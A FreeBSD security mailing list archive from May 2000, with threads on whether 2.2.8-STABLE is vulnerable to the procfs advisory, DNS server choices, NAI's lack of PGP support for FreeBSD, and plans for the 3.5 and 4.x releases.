From owner-freebsd-security Sun May 21 11: 8:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id E723337B5D4 for ; Sun, 21 May 2000 11:08:48 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id OAA97367 for freebsd-security@freebsd.org; Sun, 21 May 2000 14:08:47 -0400 (EDT) (envelope-from cjc) Date: Sun, 21 May 2000 14:08:47 -0400 From: "Crist J. Clark" To: freebsd-security@freebsd.org Subject: The procfs Hole in 2.2.8-STABLE? Message-ID: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just want to verify something before I cause myself some pain. From the wording of FreeBSD-SA-00:01, ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:02.procfs.asc Am I to take it that 2.2.8-STABLE would be vulnerable? The following seems to imply it, "Unfortunately, throughout these three years it was still possible to abuse /proc/pid/mem in a similar, though more complicated fashion, which could lead to local root compromise." Since the 2.2.x branch was the RELEASE and STABLE branch for a good part of that three years. It just occured to me recently that the UW IMAP vulnerability that allows users to get a shell combined with a procfs hole would be a Bad Thing on an old 2.2.8-STABLE mailserver I have. I'm not going to go through the pain of upgrading the OS that machine except for security reasons (it's been fine for two years, why fix what ain't broke). Do I need to do upgrade it? Maybe I'll just umount /proc. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 11:19:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E788837B680 for ; Sun, 21 May 2000 11:19:51 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id LAA15066; Sun, 21 May 2000 11:19:49 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda15064; Sun May 21 11:19:49 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id LAA01168; Sun, 21 May 2000 11:19:49 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdTe1166; Sun May 21 11:19:28 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4LIJSX67798; Sun, 21 May 2000 11:19:28 -0700 (PDT) Message-Id: <200005211819.e4LIJSX67798@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdC67788; Sun May 21 11:19:22 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: cjclark@home.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? In-reply-to: Your message of "Sun, 21 May 2000 14:08:47 EDT." <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 21 May 2000 11:19:22 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>, "Crist J. Cl ark" writes: > I just want to verify something before I cause myself some pain. From > the wording of FreeBSD-SA-00:01, > > ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:02.procfs.a > sc > > Am I to take it that 2.2.8-STABLE would be vulnerable? The following > seems to imply it, > > "Unfortunately, throughout these three years it was still possible to > abuse /proc/pid/mem in a similar, though more complicated fashion, > which could lead to local root compromise." > > Since the 2.2.x branch was the RELEASE and STABLE branch for a good > part of that three years. > > It just occured to me recently that the UW IMAP vulnerability that > allows users to get a shell combined with a procfs hole would be a Bad > Thing on an old 2.2.8-STABLE mailserver I have. I'm not going to go > through the pain of upgrading the OS that machine except for security > reasons (it's been fine for two years, why fix what ain't broke). > > Do I need to do upgrade it? Maybe I'll just umount /proc. Just umount /proc, though ps won't display the command line and gdb won't work. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 19:21:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 34A5F37B665 for ; Sun, 21 May 2000 19:21:25 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 55616 invoked by uid 1000); 22 May 2000 02:21:24 -0000 Date: Sun, 21 May 2000 22:21:24 -0400 From: Chris Johnson To: User Datagram Protocol Cc: freebsd-security@freebsd.org Subject: Re: pid file for named Message-ID: <20000521222124.A55554@palomine.net> References: <20000516131606.C16398@naiad.eclipse.net.uk> <20000516132531.M2139@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000516132531.M2139@closed-networks.com>; from udp@closed-networks.com on Tue, May 16, 2000 at 01:25:31PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 16, 2000 at 01:25:31PM +0100, User Datagram Protocol wrote: > On Tue, May 16, 2000 at 01:16:06PM +0100, Stuart Henderson wrote: > > On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote: > > > One often wishes to run daemons such as named under other users, e.g., > > > bind:bind. In order to allow bind to write out zones and associated fun > > > stuff correctly, one then does a > > > > For dns, surely djb's servers are a better choice where security is a > > priority? > > > > I have no firm figures, just subjective time perception, but a box running > djb's dnscache seemed a heck of a lot slower than another box running regular > BIND at doing reverse lookups... That hasn't been my experience, and I'm running djb's (that's Daniel J. Bernstein, if anyone's wondering) dnscache/tinydns everywhere. If you have performance problems, try posting a message to dns@list.cr.yp.to and see if anyone has anything to offer. I've been BIND-free since dnscache's first alpha release, and I haven't had a single problem. http://cr.yp.to/dnscache.html, for anyone who's interested. Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 19:25: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.maxim.net (mail.maxim.net [216.65.30.208]) by hub.freebsd.org (Postfix) with SMTP id 9B79937B54B for ; Sun, 21 May 2000 19:25:01 -0700 (PDT) (envelope-from rsohn@slip.net) Received: (qmail 60945 invoked from network); 21 May 2000 19:30:12 -0000 Received: from host206.maxim.net (HELO securabyte) (216.65.30.206) by mail.maxim.net with SMTP; 21 May 2000 19:30:12 -0000 From: "Roger Sohn" To: Subject: RE: security-digest V4 #636 Date: Sun, 21 May 2000 19:25:00 -0700 Message-ID: <000001bfc394$eeabdd00$ce1e41d8@securabyte> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 19:54:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from berlin.atlantic.net (berlin.atlantic.net [209.208.0.20]) by hub.freebsd.org (Postfix) with ESMTP id C529C37C050; Sun, 21 May 2000 19:54:02 -0700 (PDT) (envelope-from bobj@atlantic.net) Received: from mail.atlantic.net (mail.atlantic.net [209.208.0.71]) by berlin.atlantic.net (8.9.3/8.9.3) with ESMTP id WAA18790; Sun, 21 May 2000 22:58:28 -0400 Received: from bsd.cisi.com (ocalflifanb-as-1-r1-ip-574.atlantic.net [209.208.17.66]) by mail.atlantic.net (8.9.3/8.9.3) with ESMTP id WAA08966; Sun, 21 May 2000 22:53:57 -0400 Received: from nancy.cisi.com (nancy.cisi.com [192.168.0.131]) by bsd.cisi.com (8.9.3/8.9.3) with SMTP id WAA74328; Sun, 21 May 2000 22:51:49 -0400 (EDT) (envelope-from bobj@atlantic.net) Message-Id: <3.0.6.32.20000521225111.0083bb10@rio.atlantic.net> X-Sender: bobj@rio.atlantic.net X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Sun, 21 May 2000 22:51:11 -0400 To: rwatson@FreeBSD.org From: Bob Johnson Subject: NAI, PGP, and FreeBSD (was Re: HEADS UP: New host key for freefall!) Cc: security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Date: Thu, 18 May 2000 11:31:53 -0400 (EDT) >From: Robert Watson >Subject: Re: HEADS UP: New host key for freefall! > >On Thu, 18 May 2000, Martin Machacek wrote: > >> On 17-May-00 Garrett Wollman wrote: >> > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so >> > they really don't care whether the commercial product exists or not. >> > I use GnuPG, personally, since then I don't have to worry about any >> > licensing issues at all. >> >> I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any >> problems. Maybe that's another reason ... > >For all interested: I contacted the appropriate NAI/PGP developers to find >out about a native FreeBSD build a few weeks ago. The response was that >they have seen zero (0) demand for a FreeBSD build, and therefore don't B.S. - I asked their sales droids about it within the past two months. >believe there is a substantial market to support a porting effort. I >would tend to believe it's one of these, ``If you don't build it, they >won't come'' kind of things, as well as that the communication channels >between sales and development on that side are quite weak--prior to >joining NAI, I spent literally hours on the phone trying to register my >copy of PGP and failed to give them money :-(. I think this is a significant issue. I decided a year ago that it was useless to contact NAI about anything, so I don't bother. I spent five months trying to renew + upgrade a 200 user license and never got anywhere. I'd rather give my money to someone who cares. I've since changed jobs, and at my new one I attended a presentation by NAI-affiliated sales droids who were trying to convince us to use them for a 20,000-node site license. I asked them if they supported FreeBSD. They laughed and said "no". Didn't make me inclined to support them, particularly since some of the other companies looking for our business seemed much more interested in (and capable of) supporting Unix in general. > >However, I think an organized campaign here would make a difference--if >your company has an NAI/PGP sales rep, let them know that you're >interested in a native FreeBSD build. In particular, let them know if you >are willing to spend money--there's no point in building a visible demand >that falls through on the sales side, making it less likely to happen next >time :-). I already did that. As I said above, they laughed. And apparently didn't pass the word up the line. The sales droids (for any AV vendor) seem to have a hard time understanding why they should support an O/S that is installed on so few computers. I've tried to explain to them that, for example, when I set up a mail server to support 200 Windows systems, it runs FreeBSD. By supporting a FreeBSD mail server, they aren't just supporting one computer, they are supporting hundreds of computers. If they happen to be a company that supports some variation on Unix, they usually ask why I don't use that (usually Linux or Solaris). I tell them I use FreeBSD because I'd rather use a server whose developers have been thinking about security for years rather than months. Their strategy is to support the OS that they perceive to have the most users. The users, of course, tend to select the OS that they perceive as supported by the most vendors. The result is a sort of drunkard's walk in which the random noise generated by "journalists" who write articles based on a week of "evaluations" decides who is going to support what. If the vendors would instead support the OS best suited to the job, the users would tend to follow them. In any case, my experience with NAI suggests that we would be better off putting our energy into convincing just about any other AV vendor to support FreeBSD. What good does it do us for NAI to support FreeBSD if we can't actually buy their products? > > Robert N M Watson > >robert@fledge.watson.org http://www.watson.org/~robert/ >PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 >TIS Labs at Network Associates, Safeport Network Services > - Bob +-------------------------------------------------------- | Bob Johnson | bobj@atlantic.net +-------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 20: 4:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 2AACF37BB07; Sun, 21 May 2000 20:04:29 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA05249; Sun, 21 May 2000 21:04:17 -0600 (MDT) Message-Id: <4.3.1.2.20000521205727.048b9100@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Sun, 21 May 2000 21:04:14 -0600 To: Bob Johnson , rwatson@FreeBSD.ORG From: Brett Glass Subject: Re: NAI, PGP, and FreeBSD (was Re: HEADS UP: New host key for freefall!) Cc: security@FreeBSD.ORG In-Reply-To: <3.0.6.32.20000521225111.0083bb10@rio.atlantic.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 08:51 PM 5/21/2000, Bob Johnson wrote: > >For all interested: I contacted the appropriate NAI/PGP developers to find > >out about a native FreeBSD build a few weeks ago. The response was that > >they have seen zero (0) demand for a FreeBSD build, and therefore don't > >B.S. - I asked their sales droids about it within the past two months. This is typical. Sales droids ignore, or conveniently forget, requests for ports to platforms which are not already supported. They then claim that there's "no demand." Their motivation for this behavior is that their performance is measured by how much of EXISTING products they sell, not the accuracy of customer feedback they bring back from customers. They see additional platforms as making their lives more difficult. This is why so many sales droids wish that everything but Windows would go away. >I think this is a significant issue. I decided a year ago that it was >useless to contact NAI about anything, so I don't bother. I spent >five months trying to renew + upgrade a 200 user license and never >got anywhere. I'd rather give my money to someone who cares. NAI is -- alas -- a large, shortsighted, profit-oriented "blob" of a company. Other companies vanish into its gaping maw and are absorbed, losing all vestiges of their former identity. Then, the original developers of the products leave, and the products cease to be improved in significant ways. This is what happened with Helix Software, which used to make some very fine products. Eaten by NAI. (Belch!) >In any case, my experience with NAI suggests that we would be >better off putting our energy into convincing just about any >other AV vendor to support FreeBSD. I agree. Trend Micro would be a good candidate, since they furnish software to US West and US West uses FreeBSD internally (as per Barry Caplin). --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 21:38:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3A37A37BAAA for ; Sun, 21 May 2000 21:38:12 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA04469; Sun, 21 May 2000 22:38:10 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA92094; Sun, 21 May 2000 22:37:11 -0600 (MDT) Message-Id: <200005220437.WAA92094@harmony.village.org> To: cjclark@home.com Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 21 May 2000 14:08:47 EDT." <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> Date: Sun, 21 May 2000 22:37:11 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes: : Am I to take it that 2.2.8-STABLE would be vulnerable? The following Yes. There are many vulnerabilities that were fixed in 3.x that haven't been back ported to 2.x. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 21:59:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id EBEF137B58A for ; Sun, 21 May 2000 21:59:24 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA06194; Sun, 21 May 2000 22:59:00 -0600 (MDT) Message-Id: <4.3.1.2.20000521225733.048a0c40@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Sun, 21 May 2000 22:58:57 -0600 To: Warner Losh , cjclark@home.com From: Brett Glass Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200005220437.WAA92094@harmony.village.org> References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hopefully, some of the things that are being fixed in 4.0 will be backported to 3.5. We want 3.5 to be the "golden" release that we use for production until 4.2 is ready and stable. --Brett At 10:37 PM 5/21/2000, Warner Losh wrote: >In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes: >: Am I to take it that 2.2.8-STABLE would be vulnerable? The following > >Yes. There are many vulnerabilities that were fixed in 3.x that >haven't been back ported to 2.x. > >Warner > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 22:19: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5632E37B7AB for ; Sun, 21 May 2000 22:18:59 -0700 (PDT) (envelope-from imp@billy-club.village.org) Received: from billy-club.village.org (billy-club.village.org [10.0.0.3]) by rover.village.org (8.9.3/8.9.3) with ESMTP id XAA04569; Sun, 21 May 2000 23:18:57 -0600 (MDT) (envelope-from imp@billy-club.village.org) Received: from billy-club.village.org (localhost.village.org [127.0.0.1]) by billy-club.village.org (8.9.3/8.8.3) with ESMTP id XAA67456; Sun, 21 May 2000 23:18:37 -0600 (MDT) Message-Id: <200005220518.XAA67456@billy-club.village.org> To: Brett Glass Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 21 May 2000 22:58:57 MDT." <4.3.1.2.20000521225733.048a0c40@localhost> References: <4.3.1.2.20000521225733.048a0c40@localhost> <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> Date: Sun, 21 May 2000 23:18:37 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.1.2.20000521225733.048a0c40@localhost> Brett Glass writes: : Hopefully, some of the things that are being fixed in 4.0 will : be backported to 3.5. We want 3.5 to be the "golden" release that : we use for production until 4.2 is ready and stable. 4.1 should be golden enough for production in even the most demanding environments. That said, as far as I know people have been good and backported all relevant security fixes made to 4.0 back to the 3.x branch. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 23:25:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from dt051n0b.san.rr.com (dt051n0b.san.rr.com [204.210.32.11]) by hub.freebsd.org (Postfix) with ESMTP id 044A637B7C9 for ; Sun, 21 May 2000 23:25:43 -0700 (PDT) (envelope-from DougB@gorean.org) Received: from gorean.org (doug@master [10.0.0.2]) by dt051n0b.san.rr.com (8.9.3/8.9.3) with ESMTP id XAA19270; Sun, 21 May 2000 23:25:26 -0700 (PDT) (envelope-from DougB@gorean.org) Message-ID: <3928D2D5.DCA07289@gorean.org> Date: Sun, 21 May 2000 23:25:25 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.72 [en] (X11; U; FreeBSD 5.0-CURRENT-0508 i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > Hopefully, some of the things that are being fixed in 4.0 will > be backported to 3.5. Tradition (and at this point it's one that I agree with) says that only stability and security improvements get committed to the branches we're leaving behind after the most recent version branches. Adding new features to 3.x at this point would encourage people to stay with that branch. > We want 3.5 to be the "golden" release that > we use for production until 4.2 is ready and stable. Yes Brett, we're all well aware of what you want, you've stated it many times. However most of the project would prefer to help dispel the idea that the 4.x release isn't ready for production. That doesn't mean that you can't use whatever policy you want where you work, it just means that you don't need to tell us about it anymore. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 21 23:57:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id EC50937B707 for ; Sun, 21 May 2000 23:57:46 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id XAA56693; Sun, 21 May 2000 23:57:41 -0700 (PDT) (envelope-from dillon) Date: Sun, 21 May 2000 23:57:41 -0700 (PDT) From: Matthew Dillon Message-Id: <200005220657.XAA56693@apollo.backplane.com> To: Doug Barton Cc: Brett Glass , Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think 3.4 was our 'golden release' for the 3.x series. 3.5 is only going to have small cleanups, sort of like 2.2.8 had only small cleanups over 2.2.7. People have been MFCing bugs fixes reasonably well, but that's as far as it's going to go. Many of the new features in 4.x would simply be too difficult to backport into 3.x, and a lot of the really new stuff is being built on the older new stuff in 4.0-release. There is no chance of any of that being backported. My personal opinion is that the 4.0 release *already* exceeded 3.4 in regards to stability, and 4.x in general is far, far superior in virtually all regards. SMP, VM, NFS (my babies) are direct examples. 4.0 is the first release where you can actually *TRUST* all the memory manipulation and mapping syscalls (madvise, msync, mmap) to work properly! I expect 4.1 will be the banner distribution for us if 4.0 hasn't already stolen the thunder! 3.5 will be an afterthought at best. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 0:13: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from rock.ghis.net (rock.ghis.net [209.222.164.7]) by hub.freebsd.org (Postfix) with ESMTP id 30FC137BB7A for ; Mon, 22 May 2000 00:12:54 -0700 (PDT) (envelope-from will@blackdawn.com) Received: from argon.blackdawn.com (01-116.dial.008.popsite.net [209.69.194.116]) by rock.ghis.net (8.9.3/8.9.3) with ESMTP id AAA52470; Mon, 22 May 2000 00:12:27 -0700 (PDT) Received: by argon.blackdawn.com (Postfix, from userid 1000) id 1DE891998; Mon, 22 May 2000 03:11:48 -0400 (EDT) Date: Mon, 22 May 2000 03:11:48 -0400 From: Will Andrews To: Matthew Dillon Cc: Doug Barton , Brett Glass , Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? Message-ID: <20000522031147.Q96325@argon.blackdawn.com> References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> <200005220657.XAA56693@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <200005220657.XAA56693@apollo.backplane.com>; from dillon@apollo.backplane.com on Sun, May 21, 2000 at 11:57:41PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 21, 2000 at 11:57:41PM -0700, Matthew Dillon wrote: > I expect 4.1 will be the banner distribution for us if 4.0 hasn't > already stolen the thunder! 3.5 will be an afterthought at best. I agree completely with this, and hope that Jordan doesn't have a 3.5 planned. We need to move forward and focus more on RELENG_4. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 0:33:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from dt051n0b.san.rr.com (dt051n0b.san.rr.com [204.210.32.11]) by hub.freebsd.org (Postfix) with ESMTP id 0677F37B717 for ; Mon, 22 May 2000 00:33:39 -0700 (PDT) (envelope-from DougB@gorean.org) Received: from gorean.org (doug@master [10.0.0.2]) by dt051n0b.san.rr.com (8.9.3/8.9.3) with ESMTP id AAA20226; Mon, 22 May 2000 00:32:49 -0700 (PDT) (envelope-from DougB@gorean.org) Message-ID: <3928E2A1.A6B3D4A3@gorean.org> Date: Mon, 22 May 2000 00:32:49 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.72 [en] (X11; U; FreeBSD 5.0-CURRENT-0508 i386) X-Accept-Language: en MIME-Version: 1.0 To: Will Andrews Cc: Matthew Dillon , Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> <200005220657.XAA56693@apollo.backplane.com> <20000522031147.Q96325@argon.blackdawn.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Will Andrews wrote: > > On Sun, May 21, 2000 at 11:57:41PM -0700, Matthew Dillon wrote: > > I expect 4.1 will be the banner distribution for us if 4.0 hasn't > > already stolen the thunder! 3.5 will be an afterthought at best. > > I agree completely with this, and hope that Jordan doesn't have a 3.5 > planned. We need to move forward and focus more on RELENG_4. 3.5 has been promised, and Jordan already said that it will be delivered, albeit not on CD. I think it'll be worthwhile to cap it off, and focus on 4.x as you're describing. Doug -- "Live free or die" - State motto of my ancestral homeland, New Hampshire Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 0:55:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 950C437B6C4 for ; Mon, 22 May 2000 00:55:54 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id AAA15463; Mon, 22 May 2000 00:57:17 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Will Andrews Cc: Matthew Dillon , Doug Barton , Brett Glass , Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? In-reply-to: Your message of "Mon, 22 May 2000 03:11:48 EDT." <20000522031147.Q96325@argon.blackdawn.com> Date: Mon, 22 May 2000 00:57:17 -0700 Message-ID: <15460.958982237@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I agree completely with this, and hope that Jordan doesn't have a 3.5 > planned. We need to move forward and focus more on RELENG_4. Woogod, let's not go here again! We went over the whole "what was planned WILL happen" thread ad-nauseum about a month ago and suffice it to say that 3.5 WILL happen, it's been requested by at least twice as many people as have asked that it not happen, end of story. In fact, there were previously plans to do it as a "network only" release and not do a CD release, but BSDi has been forced to change even that decision in the face of customer pressure. Various customers are saying that they want 3.5 on CD and they're waving their checkbooks around. In the world of business, that generally results in a change of heart and this situation is no different. If BSDi didn't do a CD of 3.5, somebody else also would have. I have hard evidence of this. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 4:33:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id BB20537BAC7 for ; Mon, 22 May 2000 04:33:25 -0700 (PDT) 